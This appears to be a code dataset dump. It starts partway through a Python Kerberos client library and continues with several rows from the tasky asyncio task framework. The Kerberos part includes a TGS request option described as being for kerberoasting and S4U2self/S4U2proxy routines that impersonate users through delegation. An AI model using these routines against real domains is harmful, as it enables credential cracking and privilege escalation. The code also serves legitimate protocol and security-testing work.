#so we just return, the asrep can be extracted from this object anyhow
if decrypt_tgt == False:
return
self.kerberos_cipher = _enctype_table[23]
self.kerberos_cipher_type = 23
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
else:
if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
raise KerberosError(rep)
rep = rep.native
logger.debug('Got reply from server, asikg to provide auth data')
rep = self.do_preauth(rep)
logger.debug('Got valid TGT response from server')
rep = rep.native
self.kerberos_TGT = rep
cipherText = rep['enc-part']['cipher']
temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
logger.debug('Got valid TGT')
return
def get_TGS(self, spn_user, override_etype = None):
"""
Requests a TGS ticket for the specified user.
Retruns the TGS ticket, end the decrpyted encTGSRepPart.
spn_user: KerberosTarget: the service user you want to get TGS for.
override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to recieve whatever tgs tiecket
"""
#construct tgs_req
logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))
kdc_req_body['realm'] = spn_user.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype:
kdc_req_body['etype'] = override_etype
else:
kdc_req_body['etype'] = [self.kerberos_cipher_type]
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_1 = {}
pa_data_1['padata-type'] = PaDataType.TGS_REQ.value
pa_data_1['padata-value'] = AP_REQ(ap_req).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = TGS_REQ(kdc_req)
logger.debug('Constructing TGS request to server')
rep = self.ksoc.sendrecv(req.dump())
logger.debug('Got TGS reply, decrypting...')
tgs = rep.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/6a8dfc0c-2d32-478a-929f-5f9b1b18a169
def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
#def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
"""
user_to_impersonate : KerberosTarget class
"""
if not self.kerberos_TGT:
logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
self.get_TGT()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
auth_package_name = 'Kerberos'
now = datetime.datetime.utcnow()
###### Calculating authenticator data
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_auth = {}
pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()
###### Calculating checksum data
S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
S4UByteArray += user_to_impersonate.username.encode()
S4UByteArray += user_to_impersonate.domain.encode()
S4UByteArray += auth_package_name.encode()
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
chksum = {}
chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
chksum['checksum'] = chksum_data
###### Filling out PA-FOR-USER data for impersonation
pa_for_user_enc = {}
pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
pa_for_user_enc['userRealm'] = user_to_impersonate.domain
pa_for_user_enc['cksum'] = Checksum(chksum)
pa_for_user_enc['auth-package'] = auth_package_name
pa_for_user = {}
pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()
###### Constructing body
krb_tgs_body = {}
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
logger.debug('Sending S4U2self request to server')
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
logger.debug('Got S4U2self reply, decrypting...')
tgs = reply.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/c920c148-8a9c-42e9-b8e9-db5755cd281b
def S4U2proxy(self, s4uself_ticket, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
now = datetime.datetime.utcnow()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
pa_pac_opts = {}
pa_pac_opts['padata-type'] = int(PADATA_TYPE('PA-PAC-OPTIONS'))
pa_pac_opts['padata-value'] = PA_PAC_OPTIONS({'value' : PA_PAC_OPTIONSTypes(set(['resource-based constrained delegation']))}).dump()
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_tgs_req = {}
pa_tgs_req['padata-type'] = PaDataType.TGS_REQ.value
pa_tgs_req['padata-value'] = AP_REQ(ap_req).dump()
krb_tgs_body = {}
#krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','forwarded','renewable','renewable-ok', 'canonicalize']))
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','constrained-delegation', 'canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_body['additional-tickets'] = [s4uself_ticket]
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_tgs_req, pa_pac_opts]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2proxy: Failed to get S4U2proxy! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
def get_something(self, tgs, encTGSRepPart, sessionkey):
now = datetime.datetime.utcnow()
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
print(encTGSRepPart['key']['keytype'])
cipher = _enctype_table[encTGSRepPart['key']['keytype']]
authenticator_data_enc = cipher.encrypt(sessionkey, 11, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ticket'] = Ticket(tgs['ticket'])
ap_req['ap-options'] = APOptions(set([]))
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
return AP_REQ(ap_req).dump()
|
jreese/tasky | tasky/tasks/task.py | Task.sleep | python | async def sleep(self, duration: float=0.0) -> None:
'''Simple wrapper around `asyncio.sleep()`.'''
duration = max(0, duration)
if duration > 0:
Log.debug('sleeping task %s for %.1f seconds', self.name, duration)
await asyncio.sleep(duration) | Simple wrapper around `asyncio.sleep()`. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/tasks/task.py#L71-L77 | null | class Task(object):
'''Run methods on the asyncio event loop and keep track of them.'''
def __init__(self) -> None:
'''Initialize task state. Be sure to call `super().__init__()` if
you need to override this method.'''
self.task = None # asyncio.Task
self.tasky = None # Tasky manager
self.running = False
@property
def name(self) -> str:
'''This task's name.'''
return self.__class__.__name__
@property
def enabled(self) -> bool:
'''Return true if this task is enabled and should be running.'''
return True
@property
def config(self) -> 'Config':
'''Task-specific configuration data.'''
return self.tasky.configuration.task_config(self)
@property
def global_config(self) -> 'Config':
'''Global configuration data.'''
return self.tasky.configuration.global_config()
@property
def counters(self) -> 'DictWrapper':
return self.tasky.stats.task_counter(self)
async def init(self) -> None:
'''Override this method to initialize state for your task.'''
pass
async def execute(self, *args, **kwargs):
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
return await self.tasky.execute(*args, **kwargs)
async def run(self) -> None:
'''Override this method to define what happens when your task runs.'''
pass
async def run_task(self) -> None:
'''Execute the task inside the asyncio event loop. Track the time it
takes to run, and log when it starts/stops.'''
await self.run()
def time(self) -> float:
'''Return the current time on the asyncio event loop.'''
return self.tasky.loop.time()
async def stop(self, force: bool=False) -> None:
'''Cancel the task if it hasn't yet started, or tell it to
gracefully stop running if it has.'''
Log.debug('stopping task %s', self.name)
self.running = False
if force:
self.task.cancel()
|
jreese/tasky | tasky/tasks/task.py | Task.stop | python | async def stop(self, force: bool=False) -> None:
'''Cancel the task if it hasn't yet started, or tell it to
gracefully stop running if it has.'''
Log.debug('stopping task %s', self.name)
self.running = False
if force:
self.task.cancel() | Cancel the task if it hasn't yet started, or tell it to
gracefully stop running if it has. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/tasks/task.py#L84-L92 | null | class Task(object):
'''Run methods on the asyncio event loop and keep track of them.'''
def __init__(self) -> None:
'''Initialize task state. Be sure to call `super().__init__()` if
you need to override this method.'''
self.task = None # asyncio.Task
self.tasky = None # Tasky manager
self.running = False
@property
def name(self) -> str:
'''This task's name.'''
return self.__class__.__name__
@property
def enabled(self) -> bool:
'''Return true if this task is enabled and should be running.'''
return True
@property
def config(self) -> 'Config':
'''Task-specific configuration data.'''
return self.tasky.configuration.task_config(self)
@property
def global_config(self) -> 'Config':
'''Global configuration data.'''
return self.tasky.configuration.global_config()
@property
def counters(self) -> 'DictWrapper':
return self.tasky.stats.task_counter(self)
async def init(self) -> None:
'''Override this method to initialize state for your task.'''
pass
async def execute(self, *args, **kwargs):
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
return await self.tasky.execute(*args, **kwargs)
async def run(self) -> None:
'''Override this method to define what happens when your task runs.'''
pass
async def run_task(self) -> None:
'''Execute the task inside the asyncio event loop. Track the time it
takes to run, and log when it starts/stops.'''
await self.run()
async def sleep(self, duration: float=0.0) -> None:
'''Simple wrapper around `asyncio.sleep()`.'''
duration = max(0, duration)
if duration > 0:
Log.debug('sleeping task %s for %.1f seconds', self.name, duration)
await asyncio.sleep(duration)
def time(self) -> float:
'''Return the current time on the asyncio event loop.'''
return self.tasky.loop.time()
|
jreese/tasky | tasky/loop.py | Tasky.task | python | def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None | Return a running Task object matching the given name or class. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L79-L89 | null | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.init | python | async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time() | Initialize configuration and start tasks. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L91-L109 | [
"async def insert(self, task: Task) -> None:\n '''Insert the given task class into the Tasky event loop.'''\n\n if not isinstance(task, Task):\n task = task()\n\n if task.name not in self.all_tasks:\n task.tasky = self\n self.all_tasks[task.name] = task\n\n await task.init()\n\n... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.insert | python | async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task | Insert the given task class into the Tasky event loop. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L111-L132 | [
"async def start_task(self, task: Task) -> None:\n '''Initialize the task, queue it for execution, add the done callback,\n and keep track of it for when tasks need to be stopped.'''\n\n try:\n Log.debug('task %s starting', task.name)\n before = time.time()\n task.counters['last_run'] ... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
